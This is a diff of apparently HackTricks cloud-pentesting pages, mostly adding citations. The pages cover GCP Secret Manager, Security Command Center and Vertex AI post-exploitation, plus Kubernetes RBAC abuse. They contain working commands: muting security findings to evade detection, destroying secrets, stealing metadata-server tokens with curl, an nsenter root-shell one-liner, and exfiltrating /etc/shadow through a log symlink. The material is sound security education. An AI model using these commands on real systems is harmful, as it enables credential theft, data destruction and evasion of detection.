+- [14] [gcloud storage rm](https://docs.cloud.google.com/sdk/gcloud/reference/storage/rm)
+- [15] [gcloud storage buckets create](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/create)
+- [16] [gcloud storage buckets add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/add-iam-policy-binding)
+- [17] [Associate a schema with a topic](https://docs.cloud.google.com/pubsub/docs/associate-schema-topic)
+- [18] [Delete a schema for a topic](https://docs.cloud.google.com/pubsub/docs/delete-schema)
+- [19] [Replay and purge messages with seek](https://docs.cloud.google.com/pubsub/docs/replay-overview)
+- [20] [gcloud pubsub topics add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics/add-iam-policy-binding)
+- [21] [gcloud pubsub topics remove-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics/remove-iam-policy-binding)
+- [22] [gcloud pubsub topics set-iam-policy](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics/set-iam-policy)
+
+{{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
@@ -12,7 +12,9 @@ For more information about Secret Manager check:
 
 ### `secretmanager.versions.access`
 
-This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): <sup>[[1]](#references)[[2]](#references)</sup>
+
+The `secretmanager.versions.access` permission allows an identity to read a selected secret version's contents. <sup>[[1]](#references)[[2]](#references)</sup> If the value contains credentials or other privileged material, it may support privilege escalation, depending on what is stored in the secret.
 
 <details>
 
@@ -26,28 +28,36 @@ gcloud secrets versions access 1 --secret="<secret_name>"
 </details>
 
 ### `secretmanager.versions.destroy`
-The `secretmanager.versions.destroy` permission allows an identity to permanently destroy (mark as irreversibly deleted) a specific version of a secret in Secret Manager, which could enable the removal of critical credentials and potentially cause denial of service or prevent the recovery of sensitive data.
+The `secretmanager.versions.destroy` permission allows an identity to permanently destroy (mark as irreversibly deleted) a specific version of a secret in Secret Manager, which could enable the removal of critical credentials and potentially cause denial of service or prevent the recovery of sensitive data. <sup>[[2]](#references)[[3]](#references)</sup>
+
+The `secretmanager.versions.destroy` permission allows an identity to permanently destroy a specific secret version; its contents and metadata become irrecoverable. <sup>[[2]](#references)[[3]](#references)[[7]](#references)</sup> This could remove critical credentials, cause denial of service, or prevent the recovery of sensitive data.
 
 ```bash
 gcloud secrets versions destroy <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
 ```
 
 ### `secretmanager.versions.disable`
-The `secretmanager.versions.disable` permission allows an identity to disable active secret versions in Secret Manager, temporarily blocking their use by applications or services that depend on them.
+The `secretmanager.versions.disable` permission allows an identity to disable active secret versions in Secret Manager, temporarily blocking their use by applications or services that depend on them. <sup>[[2]](#references)[[4]](#references)</sup>
+
+The `secretmanager.versions.disable` permission allows an identity to disable an active secret version. A disabled version cannot be accessed and can later be re-enabled. <sup>[[2]](#references)[[4]](#references)</sup> This can temporarily block applications or services that depend on it.
 
 ```bash
 gcloud secrets versions disable <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
 ```
 
 ### `secretmanager.secrets.delete`
-The `secretmanager.secrets.delete` permission set allows an identity to completely delete a secret and all of its stored versions in Secret Manager.
+The `secretmanager.secrets.delete` permission set allows an identity to completely delete a secret and all of its stored versions in Secret Manager. <sup>[[2]](#references)[[5]](#references)</sup>
+
+The `secretmanager.secrets.delete` permission allows an identity to delete a secret and all of its stored versions; the operation is irreversible. <sup>[[2]](#references)[[5]](#references)</sup> This can remove every credential in the secret and disrupt workloads that depend on it.
 
 ```bash
 gcloud secrets delete <SECRET_NAME> --project=<PROJECT_ID>  
 ```
 
 ### `secretmanager.secrets.update`
-The `secretmanager.secrets.update` permission allows an identity to modify a secret’s metadata and configuration (for example, rotation settings, version policy, labels, and certain secret properties).
+The `secretmanager.secrets.update` permission allows an identity to modify a secret’s metadata and configuration (for example, rotation settings, version policy, labels, and certain secret properties). <sup>[[2]](#references)[[6]](#references)</sup>
+
+The `secretmanager.secrets.update` permission allows an identity to modify a secret's metadata and configuration, including rotation settings, version-related settings, labels, and other supported secret properties. <sup>[[2]](#references)[[6]](#references)</sup>
 
 ```bash
 gcloud secrets update SECRET_NAME \
@@ -56,7 +66,15 @@ gcloud secrets update SECRET_NAME \
   --rotation-period=DURATION 
 ```
 
+## References
+
+- [1] [Access a secret version](https://docs.cloud.google.com/secret-manager/docs/access-secret-version)
+- [2] [Secret Manager roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/secretmanager)
+- [3] [Destroy a secret version](https://docs.cloud.google.com/secret-manager/docs/destroy-secret-version)
+- [4] [Disable a secret version](https://docs.cloud.google.com/secret-manager/docs/disable-secret-version)
+- [5] [Delete a secret](https://docs.cloud.google.com/secret-manager/docs/delete-secrets)
+- [6] [gcloud secrets update](https://docs.cloud.google.com/sdk/gcloud/reference/secrets/update)
+- [7] [gcloud secrets versions destroy](https://docs.cloud.google.com/sdk/gcloud/reference/secrets/versions/destroy)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
@@ -14,6 +14,8 @@ For more information check:
 
 Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
 
+Hide matching findings from the default view by creating a `muteconfig`:<sup>[[1]](#references)[[6]](#references)</sup>
+
 <details>
 
 <summary>Create Muteconfig</summary>
@@ -28,6 +30,8 @@ gcloud scc muteconfigs create my-mute-config --organization=123 --description="T
 ### `securitycenter.muteconfigs.update`
 
 Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
+
+Change the filter or description of an existing `muteconfig`:<sup>[[2]](#references)</sup>
 
 <details>
 
@@ -44,6 +48,8 @@ gcloud scc muteconfigs update my-test-mute-config --organization=123 --descripti
 
 Mute findings based on a filer:
 
+Mute existing findings that match a filter:<sup>[[3]](#references)</sup>
+
 <details>
 
 <summary>Bulk mute based on filter</summary>
@@ -57,9 +63,13 @@ gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"X
 
 A muted finding won't appear in the SCC dashboard and reports.
 
+A muted finding is hidden from the default SCC findings view, but it remains available for queries and audit/compliance records; muting does not stop findings from being generated.<sup>[[6]](#references)</sup>
+
 ### `securitycenter.findings.setMute`
 
 Mute findings based on source, findings...
+
+Mute a finding by source and finding ID:<sup>[[4]](#references)</sup>
 
 <details>
 
@@ -75,6 +85,8 @@ gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 -
 
 Update a finding to indicate erroneous information:
 
+Update a finding's state, for example to mark it inactive:<sup>[[5]](#references)</sup>
+
 <details>
 
 <summary>Update finding state</summary>
@@ -85,7 +97,13 @@ gcloud scc findings update `myFinding` --organization=123456 --source=5678 --sta
 
 </details>
 
+## References
+
+- [1] [gcloud scc muteconfigs create](https://docs.cloud.google.com/sdk/gcloud/reference/scc/muteconfigs/create)
+- [2] [gcloud scc muteconfigs update](https://docs.cloud.google.com/sdk/gcloud/reference/scc/muteconfigs/update)
+- [3] [gcloud scc findings bulk-mute](https://docs.cloud.google.com/sdk/gcloud/reference/scc/findings/bulk-mute)
+- [4] [gcloud scc findings set-mute](https://docs.cloud.google.com/sdk/gcloud/reference/scc/findings/set-mute)
+- [5] [gcloud scc findings update](https://docs.cloud.google.com/sdk/gcloud/reference/scc/findings/update)
+- [6] [Mute findings in Security Command Center](https://docs.cloud.google.com/security-command-center/docs/how-to-mute-findings?hl=en)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## Vertex AI Agent Engine / Reasoning Engine
 
-This page focuses on **Vertex AI Agent Engine / Reasoning Engine** workloads that run attacker-controlled tools or code inside a Google-managed runtime.
+This page focuses on **Vertex AI Agent Engine / Reasoning Engine** workloads that run attacker-controlled tools or code inside a Google-managed runtime.<sup>[[1]](#references)</sup>
 
 For the general Vertex AI overview check:
 
@@ -20,15 +20,15 @@ For classic Vertex AI privesc paths using custom jobs, models, and endpoints che
 
 ### Why this service is special
 
-Agent Engine introduces a useful but dangerous pattern: **developer-supplied code running inside a managed Google runtime with a Google-managed identity**.
+Agent Engine introduces a useful but dangerous pattern: **developer-supplied code running inside a managed Google runtime with a Google-managed identity**.<sup>[[1]](#references)[[10]](#references)</sup>
 
 The interesting trust boundaries are:
 
 - **Consumer project**: your project and your data.
 - **Producer project**: Google-managed project operating the backend service.
-- **Tenant project**: Google-managed project dedicated to the deployed agent instance.
+- **Tenant project**: Google-managed project dedicated to the deployed agent instance.<sup>[[1]](#references)</sup>
 
-According to Google's Vertex AI IAM documentation, Vertex AI resources can use **Vertex AI service agents** as resource identities, and those service agents can have **read-only access to all Cloud Storage resources and BigQuery data in the project** by default. If code running inside Agent Engine can steal the runtime credentials, that default access becomes immediately interesting.
+According to Google's Vertex AI IAM documentation, Vertex AI resources can use **Vertex AI service agents** as resource identities, and those service agents can have **read-only access to all Cloud Storage resources and BigQuery data in the project** by default. If code running inside Agent Engine can steal the runtime credentials, that default access becomes immediately interesting.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### Main abuse path
 
@@ -39,24 +39,26 @@ According to Google's Vertex AI IAM documentation, Vertex AI resources can use *
 5. Pivot into the **producer** and **tenant** environments reachable by the same identity.
 6. Enumerate internal Artifact Registry packages and extract tenant deployment artifacts such as `Dockerfile.zip`, `requirements.txt`, and `code.pkl`.
 
+The sequence above follows the controlled deployment and cross-project pivots demonstrated by Unit 42.<sup>[[1]](#references)</sup>
+
 This is not just a "run code in your own agent" issue. The key problem is the combination of:
 
 - **metadata-accessible credentials**
 - **broad default service-agent privileges**
 - **wide OAuth scopes**
-- **multi-project trust boundaries hidden behind one managed service**
+- **multi-project trust boundaries hidden behind one managed service**<sup>[[1]](#references)[[5]](#references)</sup>
 
 ## Enumeration
 
 ### Identify Agent Engine resources
 
-The resource name format used by Agent Engine is:
+The resource name format used by Agent Engine is:<sup>[[8]](#references)</sup>
 
 ```text
 projects/<project-id>/locations/<location>/reasoningEngines/<reasoning-engine-id>
 ```
 
-If you have a token with Vertex AI access, enumerate the Reasoning Engine API directly:
+If you have a token with Vertex AI access, enumerate the Reasoning Engine API directly:<sup>[[8]](#references)</sup>
 
 ```bash
 PROJECT_ID=<project-id>
@@ -67,7 +69,7 @@ curl -s \
   "https://${LOCATION}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION}/reasoningEngines"
 ```
 
-Check deployment logs because they can leak **internal producer Artifact Registry paths** used during packaging or runtime startup:
+Check deployment logs because they can leak **internal producer Artifact Registry paths** used during packaging or runtime startup:<sup>[[1]](#references)</sup>
 
 ```bash
 gcloud logging read \
@@ -77,7 +79,7 @@ gcloud logging read \
   --format json
 ```
 
-The Unit 42 research observed internal paths such as:
+The Unit 42 research observed internal paths such as:<sup>[[1]](#references)</sup>
 
 ```text
 us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine
@@ -86,7 +88,7 @@ us-docker.pkg.dev/cloud-aiplatform-private/llm-extension/reasoning-engine-py310:
 
 ## Metadata credential theft from the runtime
 
-If you can execute code inside the agent runtime, first query the metadata service:
+If you can execute code inside the agent runtime, first query the metadata service:<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 curl -H 'Metadata-Flavor: Google' \
@@ -97,16 +99,16 @@ Interesting fields include:
 
 - project identifiers
 - the attached service account / service agent
-- OAuth scopes available to the runtime
+- OAuth scopes available to the runtime<sup>[[1]](#references)[[7]](#references)</sup>
 
-Then request a token for the attached identity:
+Then request a token for the attached identity:<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 curl -H 'Metadata-Flavor: Google' \
   'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
 ```
 
-Validate the token and inspect the granted scopes:
+Validate the token and inspect the granted scopes:<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 TOKEN="$(curl -s -H 'Metadata-Flavor: Google' \
@@ -119,13 +121,13 @@ curl -s \
 ```
 
 > [!WARNING]
-> Google changed parts of the ADK deployment workflow after the research was reported, so exact old deployment snippets might no longer match the current SDK. The important primitive is still the same: **if attacker-controlled code executes inside the Agent Engine runtime, metadata-derived credentials become reachable unless additional controls block that path**.
+> Google changed parts of the ADK deployment workflow after the research was reported, so exact old deployment snippets might no longer match the current SDK. The important primitive is still the same: **if attacker-controlled code executes inside the Agent Engine runtime, metadata-derived credentials become reachable unless additional controls block that path**.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Consumer-project pivot: service-agent data theft
 
 Once the runtime token is stolen, test the effective access of the service agent against the consumer project.
 
-The documented risky default capability is broad **read access to project data**. The Unit 42 research specifically validated:
+The documented risky default capability is broad **read access to project data**. The Unit 42 research specifically validated:<sup>[[1]](#references)[[3]](#references)</sup>
 
 - `storage.buckets.get`
 - `storage.buckets.list`
@@ -148,13 +150,13 @@ curl -s \
   "https://storage.googleapis.com/storage/v1/b/<bucket-name>/o/<url-encoded-object>?alt=media"
 ```
 
-This turns a compromised or malicious agent into a **project-wide storage exfiltration primitive**.
+This turns a compromised or malicious agent into a **project-wide storage exfiltration primitive**.<sup>[[1]](#references)</sup>
 
 ## Producer-project pivot: internal Artifact Registry access
 
-The same stolen identity may also work against **Google-managed producer resources**.
+The same stolen identity may also work against **Google-managed producer resources**.<sup>[[1]](#references)</sup>
 
-Start by testing the internal repository URIs recovered from logs. Then enumerate packages with the Artifact Registry API:
+Start by testing the internal repository URIs recovered from logs. Then enumerate packages with the Artifact Registry API:<sup>[[1]](#references)[[9]](#references)</sup>
 
 ```python
 packages_request = artifactregistry_service.projects().locations().repositories().packages().list(
@@ -172,7 +174,7 @@ curl -s \
   "https://artifactregistry.googleapis.com/v1/projects/<producer-project>/locations/<location>/repositories/llm-extension/packages"
 ```
 
-This is valuable even if write access is blocked because it exposes:
+This is valuable even if write access is blocked because it exposes:<sup>[[1]](#references)</sup>
 
 - internal image names
 - deprecated images
@@ -187,9 +189,9 @@ For more Artifact Registry background check:
 
 ## Tenant-project pivot: deployment artifact retrieval
 
-Reasoning Engine deployments also leave interesting artifacts in a **tenant project** controlled by Google for that instance.
+Reasoning Engine deployments also leave interesting artifacts in a **tenant project** controlled by Google for that instance.<sup>[[1]](#references)</sup>
 
-The Unit 42 research found:
+The Unit 42 research found:<sup>[[1]](#references)</sup>
 
 - `Dockerfile.zip`
 - `code.pkl`
@@ -203,7 +205,7 @@ curl -s \
   "https://storage.googleapis.com/storage/v1/b?project=<tenant-project>"
 ```
 
-Artifacts from the tenant project can reveal:
+Artifacts from the tenant project can reveal:<sup>[[1]](#references)</sup>
 
 - internal bucket names
 - internal image references
@@ -211,38 +213,38 @@ Artifacts from the tenant project can reveal:
 - dependency lists
 - serialized agent code
 
-The blog also observed an internal reference like:
+The blog also observed an internal reference like:<sup>[[1]](#references)</sup>
 
 ```text
 gs://reasoning-engine-restricted/versioned_py/Dockerfile.zip
 ```
 
-Even when the referenced restricted bucket is not readable, those leaked paths help map internal infrastructure.
+Even when the referenced restricted bucket is not readable, those leaked paths help map internal infrastructure.<sup>[[1]](#references)</sup>
 
 ## `code.pkl` and conditional RCE
 
-If the deployment pipeline stores executable agent state in **Python `pickle`** format, treat it as a high-risk target.
+If the deployment pipeline stores executable agent state in **Python `pickle`** format, treat it as a high-risk target.<sup>[[1]](#references)[[6]](#references)</sup>
 
 The immediate issue is **confidentiality**:
 
-- offline deserialization can expose code structure
-- the package format leaks implementation details
+- offline deserialization can expose code structure<sup>[[1]](#references)</sup>
+- the package format leaks implementation details<sup>[[1]](#references)</sup>
 
 The bigger issue is **conditional RCE**:
 
 - if an attacker can tamper with the serialized artifact before service-side deserialization
 - and the pipeline later loads that pickle
-- arbitrary code execution becomes possible inside the managed runtime
+- arbitrary code execution becomes possible inside the managed runtime<sup>[[1]](#references)[[6]](#references)</sup>
 
-This is not a standalone exploit by itself. It is a **dangerous deserialization sink** that becomes critical when combined with any artifact write or supply-chain tampering primitive.
+This is not a standalone exploit by itself. It is a **dangerous deserialization sink** that becomes critical when combined with any artifact write or supply-chain tampering primitive.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ## OAuth scopes and Workspace blast radius
 
-The metadata response also exposes the **OAuth scopes** attached to the runtime.
+The metadata response also exposes the **OAuth scopes** attached to the runtime.<sup>[[1]](#references)[[7]](#references)</sup>
 
-If those scopes are broader than the minimum required, a stolen token may become useful against more than GCP APIs. IAM still decides whether the identity is authorized, but broad scopes increase blast radius and make later misconfigurations more dangerous.
+If those scopes are broader than the minimum required, a stolen token may become useful against more than GCP APIs. IAM still decides whether the identity is authorized, but broad scopes increase blast radius and make later misconfigurations more dangerous.<sup>[[1]](#references)[[5]](#references)</sup>
 
-If you find Workspace-related scopes, cross-check whether the compromised identity also has a path to Workspace impersonation or delegated access:
+If you find Workspace-related scopes, cross-check whether the compromised identity also has a path to Workspace impersonation or delegated access:<sup>[[1]](#references)[[5]](#references)</sup>
 
 {{#ref}}
 ../gcp-to-workspace-pivoting/README.md
@@ -252,7 +254,7 @@ If you find Workspace-related scopes, cross-check whether the compromised identi
 
 ### Prefer a custom service account over the default managed identity
 
-Current Agent Engine documentation supports setting a **custom service account** for the deployed agent. That is the cleanest way to reduce blast radius:
+Current Agent Engine documentation supports setting a **custom service account** for the deployed agent. That is the cleanest way to reduce blast radius:<sup>[[1]](#references)[[10]](#references)</sup>
 
 - remove dependence on the default broad service agent
 - grant only the minimal permissions required by the agent
@@ -260,7 +262,7 @@ Current Agent Engine documentation supports setting a **custom service account**
 
 ### Validate the actual service-agent access
 
-Inspect the effective access of the Vertex AI service agent in every project where Agent Engine is used:
+Inspect the effective access of the Vertex AI service agent in every project where Agent Engine is used:<sup>[[3]](#references)[[10]](#references)</sup>
 
 ```bash
 gcloud projects get-iam-policy <project-id> \
@@ -279,7 +281,7 @@ Focus on whether the attached identity can read:
 
 ### Treat agent code as privileged code execution
 
-Any tool/function executed by the agent should be reviewed as if it were code running on a VM with metadata access. In practice this means:
+Any tool/function executed by the agent should be reviewed as if it were code running on a VM with metadata access. In practice this means:<sup>[[1]](#references)[[7]](#references)</sup>
 
 - review agent tools for direct HTTP access to metadata endpoints
 - review logs for references to internal `pkg.dev` repositories and tenant buckets
@@ -287,11 +289,15 @@ Any tool/function executed by the agent should be reviewed as if it were code ru
 
 ## References
 
-- [Double Agents: Exposing Security Blind Spots in GCP Vertex AI](https://unit42.paloaltonetworks.com/double-agents-vertex-ai/)
-- [Deploy an agent - Vertex AI Agent Engine](https://docs.cloud.google.com/agent-builder/agent-engine/deploy)
-- [Vertex AI access control with IAM](https://docs.cloud.google.com/vertex-ai/docs/general/access-control)
-- [Service accounts and service agents](https://docs.cloud.google.com/iam/docs/service-account-types#service-agents)
-- [Authorization for Google Cloud APIs](https://docs.cloud.google.com/docs/authentication#authorization-gcp)
-- [pickle - Python object serialization](https://docs.python.org/3/library/pickle.html)
+- [1] [Double Agents: Exposing Security Blind Spots in GCP Vertex AI](https://unit42.paloaltonetworks.com/double-agents-vertex-ai/)
+- [2] [Deploy an agent - Vertex AI Agent Engine](https://docs.cloud.google.com/agent-builder/agent-engine/deploy)
+- [3] [Vertex AI access control with IAM](https://docs.cloud.google.com/vertex-ai/docs/general/access-control)
+- [4] [Service accounts and service agents](https://docs.cloud.google.com/iam/docs/service-account-types#service-agents)
+- [5] [Authorization for Google Cloud APIs](https://docs.cloud.google.com/docs/authentication#authorization-gcp)
+- [6] [pickle - Python object serialization](https://docs.python.org/3/library/pickle.html)
+- [7] [View and query VM metadata](https://docs.cloud.google.com/compute/docs/metadata/querying-metadata)
+- [8] [Method: reasoningEngines.list](https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/rest/v1/projects.locations.reasoningEngines/list)
+- [9] [Method: projects.locations.repositories.packages.list](https://cloud.google.com/artifact-registry/docs/reference/rest/v1/projects.locations.repositories.packages/list)
+- [10] [Set up the environment - Vertex AI Agent Engine](https://cloud.google.com/agent-builder/agent-engine/set-up)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/README.md
+++ b/src/pentesting-cloud/kubernetes-security/README.md
@@ -12,8 +12,8 @@ kubernetes-basics.md
 
 ### Labs to practice and learn
 
-- [https://securekubernetes.com/](https://securekubernetes.com)
-- [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
+- [https://securekubernetes.com/](https://securekubernetes.com) <sup>[[1]](#references)</sup>
+- [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) <sup>[[2]](#references)</sup>
 
 ## Hardening Kubernetes / Automatic Tools
 
@@ -77,7 +77,11 @@ If you have compromised a K8s account or a pod, you might be able able to move t
 kubernetes-pivoting-to-clouds.md
 {{#endref}}
 
-{{#include ../../banners/hacktricks-training.md}}
+## References
 
+- [1] [KubeCon NA 2019 Tutorial Guide](https://securekubernetes.com/)
+- [2] [Kubernetes Goat](https://madhuakula.com/kubernetes-goat/index.html)
+
+{{#include ../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -11,13 +11,13 @@ Referring as the art of getting **access to a different principal** within the c
 
 - Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
 - Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds
-- Be able to **read secrets** as the SAs tokens are stored as secrets
+- Be able to **read secrets** as service-account tokens may be stored as Secrets<sup>[[11]](#references)</sup>
 - Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
 - A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
 
 ### Access Any Resource or Verb (Wildcard)
 
-The **wildcard (\*) gives permission over any resource with any verb**. It's used by admins. Inside a ClusterRole this means that an attacker could abuse anynamespace in the cluster
+The **wildcard (\*) gives permission over any resource with any verb**. It's used by admins. Inside a ClusterRole this can grant access across namespaces in the cluster.<sup>[[9]](#references)</sup>
 
 ```yaml
 apiVersion: rbac.authorization.k8s.io/v1
@@ -37,7 +37,7 @@ In RBAC, certain permissions pose significant risks:
 
 1. **`create`:** Grants the ability to create any cluster resource, risking privilege escalation.
 2. **`list`:** Allows listing all resources, potentially leaking sensitive data.
-3. **`get`:** Permits accessing secrets from service accounts, posing a security threat.
+3. **`get`:** Permits accessing Secrets, including service-account credentials, posing a security threat.<sup>[[9]](#references)[[11]](#references)</sup>
 
 ```yaml
 apiVersion: rbac.authorization.k8s.io/v1
@@ -53,7 +53,7 @@ rules:
 
 ### Pod Create - Steal Token
 
-An atacker with the permissions to create a pod, could attach a privileged Service Account into the pod and steal the token to impersonate the Service Account. Effectively escalating privileges to it
+An atacker with the permissions to create a pod, could attach a privileged Service Account into the pod and steal the token to impersonate the Service Account. Effectively escalating privileges to it. Pods normally receive projected, short-lived ServiceAccount tokens unless automounting is disabled; legacy or manually created token Secrets are another credential source.<sup>[[10]](#references)[[11]](#references)[[42]](#references)</sup>
 
 Example of a pod that will steal the token of the `bootstrap-signer` service account and send it to the attacker:
 
@@ -82,10 +82,10 @@ spec:
 
 The following indicates all the privileges a container can have:
 
-- **Privileged access** (disabling protections and setting capabilities)
-- **Disable namespaces hostIPC and hostPid** that can help to escalate privileges
-- **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks
-- **Mount hosts / inside the container**
+- **Privileged access** (disabling protections and setting capabilities)<sup>[[12]](#references)[[13]](#references)[[14]](#references)[[43]](#references)</sup>
+- **Disable namespaces hostIPC and hostPid** that can help to escalate privileges<sup>[[14]](#references)[[44]](#references)[[46]](#references)</sup>
+- **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks<sup>[[14]](#references)[[45]](#references)</sup>
+- **Mount hosts / inside the container**<sup>[[15]](#references)</sup>
 
 ```yaml:super_privs.yaml
 apiVersion: v1
@@ -129,7 +129,7 @@ Create the pod with:
 kubectl --token $token create -f mount_root.yaml
 ```
 
-One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions:
+One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions:<sup>[[40]](#references)</sup>
 
 ```bash
 kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
@@ -148,7 +148,7 @@ You probably want to be **stealthier**, in the following pages you can see what 
 - **hostNetwork**
 - **hostIPC**
 
-_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)
+_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)<sup>[[41]](#references)</sup>
 
 ### Pod Create - Move to cloud
 
@@ -205,22 +205,22 @@ spec:
 
 ### **Pods Exec**
 
-**`pods/exec`** is a resource in kubernetes used for **running commands in a shell inside a pod**. This allows to **run commands inside the containers or get a shell inside**.
+**`pods/exec`** is a resource in kubernetes used for **running commands in a shell inside a pod**. This allows to **run commands inside the containers or get a shell inside**.<sup>[[17]](#references)</sup>
 
-Therfore, it's possible to **get inside a pod and steal the token of the SA**, or enter a privileged pod, escape to the node, and steal all the tokens of the pods in the node and (ab)use the node:
+Therfore, it's possible to **get inside a pod and steal the token of the SA**, or enter a privileged pod, escape to the node, and steal all the tokens of the pods in the node and (ab)use the node:<sup>[[10]](#references)[[17]](#references)</sup>
 
 ```bash
 kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
 ```
 
 > [!NOTE]
-> By default the command is executed in the first container of the pod. Get **all the pods in a container** with `kubectl get pods <pod_name> -o jsonpath='{.spec.containers[*].name}'` and then **indicate the container** where you want to execute it with `kubectl exec -it <pod_name> -c <container_name> -- sh`
+> By default the command is executed in the first container of the pod. Get **all the pods in a container** with `kubectl get pods <pod_name> -o jsonpath='{.spec.containers[*].name}'` and then **indicate the container** where you want to execute it with `kubectl exec -it <pod_name> -c <container_name> -- sh`.<sup>[[17]](#references)</sup>
 
-If it's a distroless container you could try using **shell builtins** to get info of the containers or uplading your own tools like a **busybox** using: **`kubectl cp </path/local/file> <podname>:</path/in/container>`**.
+If it's a distroless container you could try using **shell builtins** to get info of the containers or uplading your own tools like a **busybox** using: **`kubectl cp </path/local/file> <podname>:</path/in/container>`**.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ### port-forward
 
-This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
+This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:<sup>[[19]](#references)</sup>
 
 ```bash
 kubectl port-forward pod/mypod 5000:5000
@@ -228,13 +228,13 @@ kubectl port-forward pod/mypod 5000:5000
 
 ### Hosts Writable /var/log/ Escape
 
-As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html), if you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\
+As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html), if you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.<sup>[[20]](#references)[[21]](#references)</sup>\
 This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs <pod>`), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\
-The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**.
+The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**; its `nodes/log` authorization mapping exposes a sensitive kubelet API.<sup>[[20]](#references)[[21]](#references)[[29]](#references)</sup>
 
 Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways:
 
-- Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing:
+- Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing:<sup>[[20]](#references)[[21]](#references)</sup>
 
 ```bash
 kubectl logs escaper
@@ -244,7 +244,7 @@ failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\
 # Keep incrementing tail to exfiltrate the whole file
 ```
 
